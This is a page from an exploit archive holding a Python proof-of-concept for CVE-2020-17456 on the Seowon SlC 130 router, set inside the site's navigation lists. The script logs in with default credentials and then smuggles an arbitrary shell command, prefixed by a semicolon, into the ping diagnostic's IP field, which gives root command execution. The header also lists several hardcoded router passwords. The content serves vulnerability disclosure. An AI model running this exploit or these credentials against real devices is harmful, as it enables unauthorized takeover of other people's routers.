Seowon SlC 130 Router Remote Code Execution

Seowon SlC 130 Router Remote Code Execution: Posted Aug 21, 2020; Authored by Ali Jalalat; Seowon SlC 130 Router suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2020-17456; SHA-256 | 2c2caed94290b76cf2dcb160e2fa1928c1b317ff58fa6be49af50b2e9dfe1014; Download | Favorite | View

Seowon SlC 130 Router Remote Code Execution

# Exploit Title: Seowon SlC 130 Router - Remote Code Execution
# Author: maj0rmil4d - Ali Jalalat
# Author website: https://secureguy.ir
# Date: 2020-08-20
# Vendor Homepage: seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29
# CVE: CVE-2020-17456
# Version: Lync:Mac firmware 1.0.1, likely earlier versions
# Tested on: Windows 10 - Parrot sec

# Description:
# user can run arbitrary commands on the router as root ! 
# as there are already some hardcoded credentials so there is an easy to trigger exploit

# credentials : 
# user => VIP
# pwd => V!P83869000

# user => Root
# pwd => PWDd0N~WH*4G#DN

# user => root
# pwd => gksrmf28

# user => admin
# pwd => admin
# 

# A  write-up can be found at:
# https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/

import requests
import sys

host = sys.argv[1]

session = requests.Session()

header = { 

"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "pplication/x-www-form-urlencoded",
"Content-Length": "132",
"Origin": "http://192.168.1.1",
"Connection": "close",
"Referer": "http://192.168.1.1/",
"Upgrade-Insecure-Requests": "1"
}



datas = {
  
  "Command":"Submit",
  "expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",
  "browserTime":"081119502020",
  "currentTime":"1597159205",
  "user":"admin",
  "password":"admin"
}


#auth

session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas)

#rce

cmd = sys.argv[2]

rce_data = {
  
  "Command":"Diagnostic",
  "traceMode":"ping",
  "reportIpOnly":"",
  "pingIpAddr":";".encode("ISO-8859-1").decode()+cmd,
  "pingPktSize":"56",
  "pingTimeout":"30",
  "pingCount":"4",
  "maxTTLCnt":"30",
  "queriesCnt":"3",
  "reportIpOnlyCheckbox":"on",
  "btnApply":"Apply",
  "T":"1597160664082"
}

rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data)

print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Seowon SlC 130 Router Remote Code Execution

Seowon SlC 130 Router Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Seowon SlC 130 Router Remote Code Execution

Share This

Seowon SlC 130 Router Remote Code Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems